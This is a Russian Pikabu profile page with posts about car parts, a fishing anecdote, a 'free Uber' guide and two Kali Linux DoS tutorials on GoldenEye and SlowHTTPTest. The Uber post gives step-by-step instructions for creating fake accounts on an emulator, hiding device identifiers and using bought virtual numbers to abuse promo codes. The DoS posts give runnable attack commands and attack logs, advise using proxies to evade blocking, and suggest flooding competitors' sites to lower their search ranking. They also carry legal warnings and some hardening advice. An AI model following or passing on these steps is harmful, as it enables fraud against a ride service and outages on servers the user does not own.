4sysadmins4

На Пикабу
75 рейтинг 8 подписчиков 1 подписка 8 постов 0 в горячем
Награды:
5 лет на Пикабу
0

Сила Пикабу!Задние наружные шрусы на Toyota Corona 1993г. St195

Всем привет, необходима мне замена задних наружных шрусов. И вот перелопатил я весь интернет в поисках и никто даже не упоминает о них. Может они не отличаются от передних? Всё, что мне удалось найти, так это привод в сборе. Помогите мне в поисках, я сюда как в последнюю инстанцию)))) Toyota Corona 1993г. St195-0028462 4wd

3

Неловкие ситуации друзей

Всем привет, у меня есть друг, который достаточно часто попадает в "неоднозначные" ситуации. Так вот ситуация, произошедшая лет 5 назад. Находясь в лесу на рыбалке и распивая спиртные напитки, по классике жанра, мой друг услышал неподалеку выстрелы из ружья и возомнив себя супергероем-антибраконьером ринулся на поиски источника шума с ружьём, взятым в целях безопасности на случай встречи с медведем, коих в наших краях предостаточно. Спустя буквально 10 минут быстрого шага в поле зрения появился Land Cruiser, мой друг молниеносно сделал вывод, что данное транспортное средство принадлежит хулигану и дабы привлечь внимание, он не придумал ничего лучше, чем прыгнуть на капот и начать стрелять в воздух. После первого выстрела из крузака выбежал мужик, выхватил у предприимчивого юноши ружьё и прикладом хорошенько вмазал по спине после чего супергеройский запал прошел и проснулась тяга к дипломатии. Так вот, как впоследствии выяснилось семейная пара в поисках разнообразия или просто уединения выехали в лес м целью приятно и романтично провести время и в тот момент, когда всё это привело к сексу, который был в самом разгаре, появился мой друг.

А какие "неоднозначные" ситуации происходили с вашими друзьями и знакомыми?

Бесплатный Uber

Что потребуется:

- эмулятор андроид (я использовал NOX, соответственно и инструкция будет на его примере)

- приложения Xprivacy и Xposed

- модуль Xprivacy для Xposed

- сервис виртуальных номеров телефонов для регистрации по SMS

Время реализации: не более 10 минут

Итак, для начала нам необходимо установить эмулятор NOX, найти его проблем не составит с помощью поисковых систем.

Скачиваем, процесс установки стандартный, ничего не меняя ждём окончания установки.

После установки эмулятор автоматически запустится. После чего нам сразу нужно произвести настройку. Для этого нажимаем на значок шестерёнки вверху окна с программой.

В настройках пункт рут-права переводим в состояние "включить", после чего NOX потребует перезагрузки - подтверждаем, ждём, когда система загрузится.

Далее нам надо настроить фиктивное местоположение, для этого нажимаем на кнопку местоположения в правой части окна.


Вводим наш адрес, подтверждаем и выходим из настройки.

Создаем и добавляем фейковый Google аккаунт в систему.

Далее заходим в Play Market и ищем [ROOT]Xprivacy Installer, устанавливаем и переходим к настройке.

Нажимаем Check for root и разрешаем программе использование рута.

Далее выставляем отметки как на скриншоте.

Нажимаем Download/install Xposed и выбираем приложение для открытия - ваш веб браузер.

Скачиваем, устанавливаем, запускаем Xposed

Нажимаем ОК на предупреждении и тапаем кнопку Установить/Обновить

Затем снова переходим к Xprivacy Installer и выставляем настройки как на скриншоте

Нажимаем Download/install Xprivacy

Очень важно из предложенных вариантов выбрать приложение Xposed Installer

В открывшемся окне переходим на вкладку "версии" и нажимаем кнопку "загрузить"

Затем снова переходим к Xprivacy Installer и выставляем всё как на скриншоте

Нажимаем Go to Xposed/Modules и не активируем (отмечаем галочку) модуль Xprivacy в Xposed

В последний раз идём к Xprivacy Installer и нажимаем "Reboot to finish installation"

Если все сделано правильно, то после перезагрузки, все будет работать. Если что-то не получается, внимательнее повторите предыдущие шаги инструкции.

Сейчас нам нужно скачать и установить приложение Uber из Play Market или apk файл, удобным для вас методом.

После чего мы должны запретить приложению Uber просматривать информацию об устройстве, а именно идентификационные данные и сетевые адреса устройства. Для этого запускаем приложение Xprivacy, в списке на установленных приложений находим наш убер и жмём на него чтобы увидеть расширенный список опций, снимаем вопросительный знак из клеток в верхней части окна одним нажатием на вопросительный знак, затем в списке снизу ставим галочки напротив строк "Идентификационные данные" и "сеть(адреса)".

Теперь убер не будет знать наши ip,mac, IMEI.

Переходим непосредственно к регистрации в Uber.

Нам нужен виртуальный номер телефона для подтверждения регистрации по СМС. Сервисов предоставляющих номер в сети много, можете выбрать любой.

Я юзал https://smska.net, пополнялся с банковской карты, также там очень много других способов пополнения счета, можно выбрать удобный для вас.

Номер для регистрации в Uber там стоит 2₽. Покупаем.

Дальше регистрация в Uber идёт так, как если бы вы регистрировались на свой реальный номер. Только код подтверждения придет на виртуальный номер и найти его можно будет в специальной графе на сайте в одной ячейке с номером телефона. Бывает, что приложение убер лагает и код не приходит с первой попытки. Чтобы повторить отправку кода, нажимаем на соответствующую кнопку в приложении, а на сайте жмём кнопку "повторить". Обычно код приходит с первого раза, но не позднее третьего в случае, если Uber затупил. Всё, код получили и все ввели в соответствующее поле в приложении, дальше указываем выдуманные имя и фамилию, адрес электронной почты и способ оплаты "наличные".

Вводим промо код, где его брать решать вам, я к примеру брал на сайте http://uber-russia.ru

На этом собственно всё. Приятных и дешёвых вам поездок!

Источник: Telegram канал IT-Специалист (@to_sysadmins)

http://katvin.ru/?aHR0cHM6Ly90Lm1lL3RvX3N5c2FkbWlucw=%3D

Показать полностью 12
3

DoS веб-сайта в Kali Linux с GoldenEye

В предыдущей статье уже говорилось об инструменте

DoS, который может сильно нагрузить серверы HTTP, чтобы парализовать их работу из-за исчерпания пула ресурсов. GoldenEye — это ещё один, со своими особенностями, который может положить сервер за 30 секунд, в зависимости от того, насколько велик пул его памяти. Конечно, он не работает на защищённых серверах и серверах за

правильно настроенными WAF, IDS. Но это отличный инструмент для тестирования

вашего веб-сервера на повышенную нагрузку. А на основании полученных результатов

можно изменить правила iptables/файерволов для увеличения устойчивости и

сопротивляемости к негативным факторам.

Подробности об инструменте GoldenEye:

Название утилиты: GoldenEye

Автор: Jan Seidl

Веб-сайт: http://wroot.org/

Из поста автора GoldenEye:

1. Этот инструмент предназначен только для целей исследования и любое другое

вредоносное его использование запрещено.

2. GoldenEye — это приложение на питоне для ТОЛЬКО ЦЕЛЕЙ ТЕСТИРОВАНИЯ

БЕЗОПАСНОСТИ!

3. GoldenEye это инструмент тестирования HTTP DoS.

4. Эксплуатируемый вектор атаки: HTTP Keep Alive + NoCache

Типы DoS или DDoS атак

Давайте пройдёмся по самой базовой информации об атаках DoS или. DDoS. Обычно

выделяют три вида DoS и DDoS атак:

1. DoS и DDoS атаки уровня приложений

2. DoS и DDoS атаки уровня протокола

3. DoS и DDoS атаки насыщения полосы пропускания

DoS и DDoS атаки уровня приложений

DoS и DDoS атаки уровня приложений — это атаки, которые нацелены на Windows,

Apache, OpenBSD или другое программное обеспечение для выполнения атаки и краха

сервера.

DoS и DDoS атаки уровня протокола

DoS и DDoS атаки уровня протокола — это атаки на уровне протокола. Эта категория

включает Synflood, Ping of Death и другие.

DoS и DDoS атаки насыщения полосы пропускания

Этот тип атак включает ICMP-флуд, UDP-флуд и другие типы флуда, осуществляемые

через поддельные пакеты.

Слова DoS и DDoS близки по значению. Когда атака ведётся с одной машины, обычно

говорят о DoS атаке. При большом количестве атакующих из ботнета (или группы)

говорят о DDoS атаке. Об этих атаках доступно много информации, но не важна, какого

типа эта атака, т. к. они все одинаково вредны для сервера/сети.

Загрузка GoldenEye

Сторонние программы, установленные не из репозитория, я собираю в каталоге ~/opt.

Если у вас нет каталога для сторонних программ, то создайте его и перейдите туда:

1| mkdir opt

2| cd opt

Следующая большая команда создаст каталог, загрузит туда последнюю версию

GoldenEye, распакует архив и сразу запустит GoldenEye (покажет справку по

программе):

1| mkdir GoldenEye && cd GoldenEye && wget

https://github.com/jseidl/GoldenEye/archive/master.zip && unzip master.zip && cd

GoldenEye-master/ && ./goldeneye.py

Если вам хочется всё сделать самому — постепенно, то продолжаем. Для начала

создаём каталог GoldenEye, переходим туда и скачиваем архив с программой:

1| root@WebWare-Kali:~/opt# mkdir GoldenEye

2| root@WebWare-Kali:~/opt# cd GoldenEye

3| root@WebWare-Kali:~/opt/GoldenEye# wget

https://github.com/jseidl/GoldenEye/archive/master.zip

После скачивания распаковываем файл архива master.zip.

1| unzip master.zip

Теперь у нас появился каталог GoldenEye-master, переходим туда и проверяем его

содержимое:

1| ls

2| cd GoldenEye-master/

3| ls

Запуск GoldenEye – досим веб-сайт

Запуск очень прост, делается это так:

1| ./goldeneye.py

Программа показывает нам свою справку:

Необходимо осведомлять пользователей о расписании тестирования и возможных

перебоях в работе. Поскольку часто результатом симуляции атаки является остановка

работы.

Ну и все другие предупреждения: вы не должны тестировать (симулировать атаку)

других без их разрешения. Поскольку в случае причинения вреда, вы можете быть

привлечены к ответственности в соответствии с законодательством.

Данная информация размещена в образовательных целях. Для тестирования своих

серверов, для анализа качества их настройки и разработки мер противодействия

атакам.

Запуск слегка различается от используемой вами ОС:

1| root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py

http://www.goldeneyetestsite.com/

(или)

1| sudo ./goldeneye.py http://www.goldeneyetestsite.com/

(или)

1| python goldeneye.py http://www.goldeneyetestsite.com/

В зависимости от того, где вы сохранили файлы, подредактируйте ваш путь и команду.

Далее тесты GoldenEye:

Следить за состоянием сервера я буду командой top:

Т.е. сервер находится в состоянии простоя, процесс полностью свободен, свободной

оперативной памяти доступно 350 мегабайт.

Атака

1| ./goldeneye.py http://192.168.1.37/info.php

Результат

Можно посмотреть по скриншоту, процессор по-прежнему практически бездействует,

но количество свободной памяти резко сократилось, увеличилось количество спящих процессов.

Тем не менее, сервер не удалось полностью положить при атаке в один поток (хотя

вообще-то, такая задача и не ставилась).

Анализ атаки GoldenEye

Посмотрим лог сервера:

1| cat /var/log/apache2/access.log | grep -E '192.168.1.55'

Я использую grep -E '192.168.1.55', чтобы отфильтровать подключения только с

машины, с которой велась атака.

Видим там примерно такое:

1| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?vySSDx=tG1rmfX4HbYXBm&CKVuvV=JLoK&nHc8x=0x5YKQtvHs0HWS68

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3)

AppleWebKit/535.6 (KHTML, like Gecko) Version/6.0.5 Safari/535.17"

2| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET

/info.php?dC1FyXpw=hB6Oh&rjcf74A=YVA&YUtUXuDo2s=2pLY7nlq&SjyqoF=wUIx8Aq&tXkr

fJRw=LsgED HTTP/1.1" 200 69504 "http://www.baidu.com/k1IkNXv" "Mozilla/5.0

(Macintosh; Intel Mac OS X 11_0_4) AppleWebKit/536.12 (KHTML, like Gecko)

Chrome/10.0.623.89 Safari/536.26"

3| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJE2Fbx6&lPS=53T0AUI6Xu&5EbHY=scv1yBq8O

6Y&JJthAkQqqk=HUEQBD5ONbAMxVlWHxai HTTP/1.1" 200 69504 "-" "Mozilla/5.0

(Windows NT 5.1; WOW64) Gecko/20021304 Firefox/12.0"

4| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?SAQMIx5Pl=VWGEFj3q8N0

HTTP/1.1" 200 69504

"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&amp...

Gh6q2sVlyHBdK&bl185B=anwKamnu2xK&RpI=HA0wNexUytc&uOqLV=6TNbGepqbnr&uu2fj

tL63=u5lnA701na4cYYH0yN&TOY066XT=3WJQhmtXRyCo46HnbXY1" "Mozilla/5.0 (Linux

x86_64; X11) Gecko/20010905 Firefox/17.0"

5| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbDfSXd=8Jm5hqt&xPC=1qwBHvMDy7gl

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20011709

Firefox/23.0"

6| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?t2U0aYjxm=q21n4BARB1&qxI1=cTw&XjGPpG=W3AAWvebbW HTTP/1.1" 200

69504 "http://www.baidu.com/bQnoS7ULAY" "Mozilla/5.0 (Windows NT.6.2; Win64; x64)

AppleWebKit/536.10 (KHTML, like Gecko) Chrome/18.0.1844.44 Safari/537.21"

7| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?nkIkop=6pivICjNb6&U3Y=dDlbGnW3feTEXCm&aH2JLMl=sGmkpeSLnTtXahs7agi&

8htjBss=DFuXcUiJ5G5Fu7c HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (compatible; MSIE 10.0;

Macintosh; .NET CLR 3.0.8867; Intel Mac OS X 11_6_2)"

8| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET

/info.php?p6P23Hj=IcVgaSIUoVTanmFIDan&WWml82r3D=TCY8rta5YrwVsLJmrM HTTP/1.1"

200 69504

"http://www.baidu.com/fWaBwllK?aNP85MesWv=VhL6v32qtwyj&6C...

YXmLk2w&Uy3wv=4pvNH8y&Jvirs=RJ4hKfRa&HyIYt8gtP=CHjm8OJaOP2djoQS&rm7bH=rukJ

4726B14D3XOxDwJ6&QBkOD3=33qpPxVM3ih76MaSgnT&s7gO=3WrX3Vd&Vsh=A13d"

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) AppleWebKit/536.10 (KHTML, like Gecko)

Chrome/15.0.1172.45 Safari/535.15"

9| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?so64O=2GhoHQaFy&DSmxwEWk=tYxV&y1C7mM=kQbuxco5oJfLPocGLl&kbItk4Rl

j=LjVhrLgelmtLYDuldfF HTTP/1.1" 200 69504

"http://192.168.1.37/uxNqvi6EnN?cAyrBjvKc=OsSGuqs&rrlLD=2..." "Mozilla/5.0

(Windows; U; MSIE 10.0; Windows NT 5.1; .NET CLR 2.2.16303; Win64; x64)"

10| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?EXRbe03wp=fEBV5exjikcr8oNbEkmN&vpg8wYXv=DMGpYP1RMBUglSjbv4g&55prJ

=fY78WvDU3vW7GaoW4etN&JWEFmlYFU=yFyBEk7 HTTP/1.1" 200 69504 "-" "Mozilla/5.0

(Windows; U; MSIE 8.0; Linux x86_64; .NET CLR 1.0.1395; X11)"

11| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?7xIRdP0=8mjyacN&kEd2MwYtJ=bWhJvAH3A1H&xWe7vp6nH=faGl3PGJ4xAf&dSn

j5CW=wOBRfkLbMrEWdmMFvov&xWPL3sYb=WN0yYPXu HTTP/1.1" 200 69504 "-"

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_0) Gecko/20062612 Firefox/18.0"

12| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?lVn80y605=IDRbDmoiDyNBu

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) Gecko/20052008

Firefox/18.0"

13| 192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET

/info.php?mAthtfI=c4QdAopYyQGAsJAl0XUH HTTP/1.1" 200 69504

"http://www.yandex.com/jbOJRnhpii?fW4YmYLq=6A6f8qyxLRk6" "Mozilla/5.0 (Linux i386;

X11) AppleWebKit/536.27 (KHTML, like Gecko) Version/4.1.4 Safari/537.21"

14| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?1nwS7r=g6qpYcfOre

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Linux i386; X11) Gecko/20053002 Firefox/15.0"

15| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?00iHfl2=CGhueehx3DqR32D&MnPMIcqiTN=HcIR&GFgFaO=IJL HTTP/1.1" 200

69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3) AppleWebKit/535.29 (KHTML,

like Gecko) Chrome/19.0.1233.51 Safari/536.18"

16| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?Ml1k=DFVW0F7 HTTP/1.1"

200 69504 "-" "Mozilla/5.0 (Linux i386; X11) AppleWebKit/537.1 (KHTML, like Gecko)

Chrome/8.0.1320.86 Safari/535.21"

17| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?khUn=xnRp0gXjlF&bl8TpeXEF5=28W&wPkB=cnOPTgwOpPGC&12cnFT6b=XNDSX

FPdtraDsR&0FqigAn62=Kl4Y7pj2e7lj0nGoGN HTTP/1.1" 200 69504 "-" "Mozilla/5.0

(Windows NT.6.2; Win64; x64) AppleWebKit/537.3 (KHTML, like Gecko) Version/5.1.2

Safari/536.32"

Одного взгляда на логи достаточно, что каждый запрос GET содержит различные

строки, различные пользовательские агенты и различных реферов, среди которых Bing,

Baidu, Yandex и другие рандомные поисковые системы.

Так что происходит, когда ваш веб-сервер встречается с этой атакой? Он анализирует

входящий трафик, проверяет запрашиваемые URL, адреса источников и поле Referrer и пропускает их с кодом 200 OK. Почему? Потому что каждый браузер был различным.

Инструмент был создан остроумно так, чтобы любой сервер мог подумать, что это

различные пользователи, пытающие зайти с одного IP (может быть IP прокси или

большой организации?) с различными браузерами (Firefox, Chrome, MSIE, Safari и т. д.),

различными операционными системами (Mac, Linux, Windows и т.д.) и даже с

различными реферами. Да, возможно запрашиваемый URL был неправильным, но

нормальные веб-сервера всё равно пропустят его, перенаправят на страницу ошибки в

то время как соединение будет оставаться открытым (например, Apache worker/socket).

Стандартный веб-сервер обычно позволяет X число одновременных пользователей с

одного IP и с большим количеством соединений/используемых сокетов, этот тип атаке

приводит к тяжёлому давлению на сервер и последующие пользователи получают

ошибку (HTTP 503 или наподобии). Следовательно, атакующий с несколькими

рандомными proxy/VPN может быстро истощить ресурсы сервера. Он даже может

замедлить атаки на один IP для избежания начального выявления:

1| root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py

http://www.goldeneyetestsite.com/ -w 10 -s 10 -m random

Вышеприведённая команда использует:

-w = 10 одновременные рабочие

-s = 10 одновременных соединений

-m = рандом, смесь GET и POST

Совершенный DoS!

Интересное наблюдение по Google Analytics и GoldenEye

Я попробовал это в живую, чтобы просто посмотреть, как поведёт себя реальный веб-

сервер. Интересно, оказывается что Google Analytics воспринимает этот трафик как

реальный и добавляет данные от флуда в статистику (хотя он и идёт с одного IP, но

различные рефереры и браузеры убеждают Google в том, что это отдельные

пользователи). Можно придумать ещё пару способов эксплуатировать это:

 Можно повышать свой рейтинг в Google, т. к. она будет воспринимать это как

легитимный трафик.

 Если Google будет наказывать за это, то тогда можно зафлудить веб-сайты

конкурентов для понижения их ранжирования в Google.

Эта палка о двух концах.

Блокирование/защита от атаки GoldenEye

Следующие предложения хорошо сработают, когда вы используете Apache:

1. Понижение соединений на один IP (обычно их 300 на IP для Apache)

2. Редактирование порога соединений на IP

3. Отключить настройки KeepAlive и нижний Connection Timeout (по умолчанию это

300)

4. Если вы хоститесь на общем сервере, обратитесь к сисадминам. Если они не

могут защитить от этой простой атаки, то просто переезжайте к хостинг

компании получше.

5. Используйте Web application Firewall (WAF).

6. Использование белых листов для входящих запросов — и эта атака не окажет

эффекта на ваш сервер.

7. NGINX и Node.js вроде бы лучше справляются с атаками подобного рода.

Заключение

GoldenEye выглядит как расширенная (или схожая на) HTTP Flooder программа. Обе

работают похожим образом, но NoCache и KeepAlive от GoldenEye делают большую

разницу. Также она использует интересный способ перемешивания браузеров,

операционных систем и рефереров, что может обмануть файервол.

В общем, это хороший инструмент для тестирования на нагрузку своего собственного

веб-сайта (с разрешения вашей хостинг компании), вашего корпоративного веб-сайта и

любых веб-приложений, которые позволяют входящие GET или POST запросы.

Используйте её для обновления ваших правил файервола. WAF и благодаря

этому избежите будущих атак.


Источник: Telegram канал "IT-Специалист" t.me/to_sysadmins

Показать полностью
5

Стресс-тест сети в Kali Linux

Стресс-тесты сети могут дать важные данные о проблемах, связанных с

производительностью сервера, о неправильной (недостаточной) его настройке. Даже

чтобы проверить, правильно ли настроен и работает mod_evasive пригодятся утилиты

для имитации DoS атак.

SlowHTTPTest — это имеющий множество настроек инструмент, симулирующие

некоторые атаки отказа в обслуживании (DoS) уровня приложения. Он работает на

большинстве платформ Linux, OSX и Cygwin (Unix-подобное окружение и интерфейс

командной строки для Microsoft Windows).

Эта программа реализует наиболее общие замедляющие работу сети DoS атаки уровня

приложений, такие как Slowloris, атака slow body, атака Slow Read (на основе эксплойта

постоянного таймера TCP), она занимает весь доступный пул подключений, а также

атака Apache Range Header, которая становится причиной очень значительного

использования памяти и центрального процессора на сервере.

Slowloris и Slow HTTP POST DoS атаки полагаются на факт, что HTTP, намеренно, требует

от запросов быть полученными сервером полностью до того, как они будут

обработаны. Если запрос HTTP неполон или скорость его пересылки очень медленная, сервер сохраняет своио ресурсы занятыми, ожидая оставшихся данных. Если сервер

поддерживает слишком много занятых ресурсов, то это влечёт отказ в обслуживании.

Этот инструмент отправляет частичные запросы HTTP, пытаясь добиться отказа в

обслуживании от целевого HTTP сервера.

Атака Slow Read нацелена на те же ресурсы, что и slowloris со slow body, но вместно

продлевания запроса, она отправляет легитимные HTTP запросы, но ответы читает

медленно.

Установка SlowHTTPTest

Установка для пользователей Kali Linux

Для пользователей Kali Linux установка через apt-get

| apt-get install slowhttptest

Теперь только остаётся выполнить конфигурацию, компиляцию и установку.

1| $ tar -xzvf slowhttptest-x.x.tar.gz

2| $ cd slowhttptest-x.x

3| $ ./configure --prefix=PREFIX

4| $ make

5| $ sudo make install

Здесь PREFIX должен быть заменён на абсолютный путь, где инструмент slowhttptest

должен быть установлен.

У вас должна быть установлена libssl-dev для успешной компиляции этого инструмента.

Большинство систем должны иметь его.

Использование SlowHTTPTest

slowhttptest это потрясающий инструмент, который позволяет делать многие вещи.

Далее только несколько примеров использования.

Пример использования в режиме slow body a.k.a R-U-Dead-Yet, результаты только

выводятся на экран:

1| slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php x 10 -p 3

Тоже самое, но график сохраняется в файл:

1| lowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u

http://192.168.1.37/info.php -x 10 -p 3

А это тесты памяти, которые я проводил с интервалами в несколько секунд на сервере,

который подвергался атаке. Первый замер сделан до атаки, последующие — во время.

Видно, что количество свободной памяти уменьшалось очень стремительно вплоть до

того момента, пока сервер не лёг.

Пример использования в режиме slow headers a.k.a. Slowloris:

1| slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3

Тоже самое, но график сохраняется в файл:

1| slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u

http://192.168.1.37/info.php -x 24 -p 3

Всё очень похоже: сервер лёг и больше не поднимался:

Пример использования в режиме Slow Read через прокси.

Здесь x.x.x.x:8080 — это прокси, который используется для доступа к веб-сайту с IP

отличного от вашего:

1| slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l

350 -e x.x.x.x:8080

Сервер в нокауте:

Вывод по SlowHTTPTest

В зависимости от выбранного уровня детальности, вывод может быть как простым в

виде генерируемых каждый 5 секунд сообщений, показывающих статус соединений

(это при уровне 1), так и полным дампом трафика (при уровне детальности 4).

-g опция означает создание файла CSV, а также интерактивного HTML, основанного на

инструментах Google Chart.

Приведённые выше скриншоты показывают состояние соединений и доступность

сервера на различных этапах времени, а также дают общую картину поведения

конкретного сервера под конкретной нагрузкой во время заданного временного

интервала.

Файл CSV может быть полезен в качестве источника для вашего любимого инструмента

по работе с данными, среди них могут быть MS Excel, iWork Numbers или Google Docs.

Последнее сообщение, которые выводит программа при закрытии, этот статус

завершения, они могут быть следующими:

 “Hit test time limit” программа достигла лимита времени, заданного аргументом

-l

 “No open connections left” пир закрыл все соединения

 “Cannot establish connection” не было установлено соединений за время N

секунд теста, где N или величина аргумента -i, или 10 (значение по умолчанию).

Это может случиться если нет маршрута к удалённому хосту или пир лёг.

 “Connection refused” удалённый сервер не принимает соединения (может быть

только от тебя? Попробуйте использовать прокси) на определённом порту

 “Cancelled by user” вы нажали Ctrl-C или отправили SIGINT каким-либо другим

образом

 “Unexpected error” не должно никогда случаться.

Примеры вывода реальных тестов SlowHTTPTest

Примеры уже даны чуть выше, давайте сделаем ещё один. Как и в предыдущие разы у

меня доступ к атакующей и атакуемой машинам, поэтому есть возможность выполнить

замеры на обоих. В этот раз посчитаем количество соединений.

Со стороны атакующего

Итак, я собрал статистику для атаки на http://192.168.1.37 с 1000 соединениями.

1| slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u

http://192.168.1.37/info.php -x 10 -p 3

Со стороны сервера-жертвы

1| root@WebWare-Debian:~# netstat | grep http | wc -l

2| 111

Показатели не получается снять во время проведения атаки, т. к. по SSH сервер также

перестаёт отвечать. Общее число http соединений подпрыгнуло до 111 в первые 10

секунд.

Этого более чем достаточно чтобы положить сервер (это могут быть большинство

маленьких серверов или VPS).

Рекомендации по тестированию DoS

 DoS атака чужих серверов без разрешения, особенно успешная, является

преступлением, в том числе в РФ

 При атаке на локалхост (особенно на маломощных и виртуальных машинах),

тормоза сервера могут быть связаны не с DoS атакой, а с тем, что сама

программа SlowHTTPTest заняла все ресурсы и сама по себе тормозит

компьютер.

 Если при атаке на удалённый хост программа пишет вам, что он недоступен, а

при попытке открыть страницу веб-сайта в браузере действительно ничего не

открывается, то не спешите радоваться. Вполне возможно, сто сработала защита

от DoS атаки и ваш IP (временно) заблокирован. Для всех остальных сайт

прекрасно открывается. Можете убедиться в этом сами, используя любой

анонимайзер или прокси или подключившись через другого Интернет-

провайдера.

Заключение

Это можно делать с Windows, Linux и даже с Mac. Если вы запустите несколько DoS

инструментов, таких как GoldenEye, hping3 на один веб-сервер, то тогда его будет очень

просто выбить. Общие советы по защите от DoS будут в следующей статье (да,

следующая статья опять про стресс-тест сети). А о правильной настройке сервера, в том

числе о модуле, защищающим именно от слоу-атак, будет рассказано в ближайшее

время.

Материал взят из Telegram канала "IT-Специалист" t.me/to_sysadmins

Показать полностью
Отличная работа, все прочитано!